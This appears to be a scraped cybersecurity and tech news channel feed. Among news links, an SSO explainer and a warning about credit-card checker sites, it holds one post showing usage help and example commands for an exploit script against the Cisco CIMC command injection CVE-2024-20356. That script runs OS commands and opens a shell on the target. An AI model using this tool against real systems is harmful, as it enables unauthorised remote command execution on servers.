⚡️ #Samsung Delays One UI 70 Beta #Update for #Galaxy S24 Series

https://undercodenews.com/samsung-delays-one-ui-70-beta-update-for-galaxy-s24-series/

@Undercode_News

🦑Command Injection vulnerability in Cisco's CIMC:

>> Use it for testing purposes only !!!

CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
options:
  -h, --help            Show this help message and exit
  -t HOST, --host HOST  Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
  -u USERNAME, --username USERNAME
                        Username (default: admin)
  -p PASSWORD, --password PASSWORD
                        Password (default: cisco)
  -a ACTION, --action ACTION
                        Action: test, cmd, shell, dance (default: test)
  -c CMD, --cmd CMD     OS command to run (Default: NONE)
  -v, --verbose         Displays more information about cimc

Example commands:

CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v

CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'

CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell

CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🌐 Elon Musk: The Internet Visionary

https://undercodenews.com/elon-musk-the-internet-visionary/

@Undercode_News

🌐 A Hilariously Honest Wedding Invite Takes the Internet by Storm

https://undercodenews.com/a-hilariously-honest-wedding-invite-takes-the-internet-by-storm/

@Undercode_News

⚡️ Airtel Introduces New Prepaid Plan with Hotstar Mobile

https://undercodenews.com/airtel-introduces-new-prepaid-plan-with-hotstar-mobile/

@Undercode_News

🦑Safe CC Checkers :

Credit card checker (CC checker) sites are generally unsafe and pose serious risks, as they are commonly used for fraudulent purposes or involve illegal activities. Legitimate businesses and individuals should avoid such platforms to protect themselves legally and financially. Here's why these sites are risky:

Illegal Usage: Most CC checkers facilitate fraud by validating stolen credit card information.
Data Theft: Entering sensitive details on these platforms can lead to your personal data being stolen.
Malware Risks: Many such sites embed malware or phishing attempts.
Legal Issues: Accessing or using these sites can expose you to legal action.

S O :

To Check you CC Validity use only These URLS !!!


1️⃣Stripe
https://stripe.com
A powerful payment processing platform with fraud prevention features.

2️⃣PayPal
https://www.paypal.com
A widely used and secure platform for online transactions.

3️⃣Square
https://squareup.com
Offers payment solutions and tools for small businesses.

4️⃣Kount
https://kount.com
Fraud prevention and digital identity trust solutions.

5️⃣Fraud.net
https://fraud.net
Provides AI-powered fraud detection for businesses.

6️⃣Riskified
https://www.riskified.com
Fraud prevention and chargeback protection for eCommerce.

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Samsung Unveils Exclusive Olympic Edition #Galaxy Z Flip 6

https://undercodenews.com/samsung-unveils-exclusive-olympic-edition-galaxy-z-flip-6/

@Undercode_News

⚡️ GM and #LG Energy Solution Gear Up for Prismatic Battery Era in New Partnership

https://undercodenews.com/gm-and-lg-energy-solution-gear-up-for-prismatic-battery-era-in-new-partnership/

@Undercode_News

One UI 70 Beta: #Galaxy S23 Series Users Face Delays

https://undercodenews.com/one-ui-70-beta-galaxy-s23-series-users-face-delays/

@Undercode_News

🦑SSO (Single Sign-On) Explained.

SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.

In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.

To fully understand the SSO process, 𝗹𝗲𝘁’𝘀 𝘁𝗮𝗸𝗲 𝗮 𝗹𝗼𝗼𝗸 𝗮𝘁 𝗵𝗼𝘄 𝗮 𝘂𝘀𝗲𝗿 𝘄𝗼𝘂𝗹𝗱 𝗹𝗼𝗴 𝗶𝗻𝘁𝗼 𝗟𝗶𝗻𝗸𝗲𝗱𝗜𝗻 𝘂𝘀𝗶𝗻𝗴 𝗚𝗼𝗼𝗴𝗹𝗲 𝗮𝘀 𝘁𝗵𝗲 𝗶𝗱𝗲𝗻𝘁𝗶𝘁𝘆 𝗽𝗿𝗼𝘃𝗶𝗱𝗲𝗿:

1️⃣ 𝗨𝘀𝗲𝗿 𝗿𝗲𝗾𝘂𝗲𝘀𝘁𝘀 𝗮𝗰𝗰𝗲𝘀𝘀

First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".

2️⃣ 𝗔𝘂𝘁𝗵𝗲𝗻𝘁𝗶𝗰𝗮𝘁𝗶𝗼𝗻 𝗿𝗲𝗾𝘂𝗲𝘀𝘁

From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.

3️⃣ 𝗜𝗱𝗣 𝗰𝗵𝗲𝗰𝗸𝘀 𝗳𝗼𝗿 𝗮𝗰𝘁𝗶𝘃𝗲 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.

4️⃣𝗨𝘀𝗲𝗿 𝘀𝘂𝗯𝗺𝗶𝘁𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).

5️⃣ 𝗜𝗱𝗣 𝘃𝗲𝗿𝗶𝗳𝗶𝗲𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.

6️⃣ 𝗜𝗱𝗣 𝘀𝗲𝗻𝗱𝘀 𝘁𝗼𝗸𝗲𝗻 𝘁𝗼 𝗦𝗲𝗿𝘃𝗶𝗰𝗲 𝗣𝗿𝗼𝘃𝗶𝗱𝗲𝗿

Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).

7️⃣ 𝗔𝗰𝗰𝗲𝘀𝘀 𝗴𝗿𝗮𝗻𝘁𝗲𝗱 𝘂𝘀𝗶𝗻𝗴 𝗲𝘅𝗶𝘀𝘁𝗶𝗻𝗴 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.

SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.

ref: Sayed Jillani
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

⚡️ The #iPhone 16's USB-C Revolution: A New Connectivity

https://undercodenews.com/the-iphone-16s-usb-c-revolution-a-new-connectivity/

@Undercode_News

🟠 Synack Tarjet SQL Injection (Blind Time-Based) Medium

https://dailycve.com/sql-injection-blind-time-based-medium/

@Daily_CVE

🛒 Salesforce Expands Reach: Unified South Asia Operating Unit

https://undercodenews.com/salesforce-expands-reach-unified-south-asia-operating-unit/

@Undercode_News

🦑Scammers Actually Conduct Phishing Calls

- Secure yourself

ref: instagram
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

📱 #Apple's Mac Pro: A Chip Short of a Full Deck

https://undercodenews.com/apples-mac-pro-a-chip-short-of-a-full-deck/

@Undercode_News

🛡️ Microsegmentation Revolutionized: Secure Workload 310

https://undercodenews.com/microsegmentation-revolutionized-secure-workload-310/

@Undercode_News

⚠️ Level Up Your Security Game: Leverage #Copilot Chat for #GitHub Advanced Security Alerts

https://undercodenews.com/level-up-your-security-game-leverage-copilot-chat-for-github-advanced-security-alerts/

@Undercode_News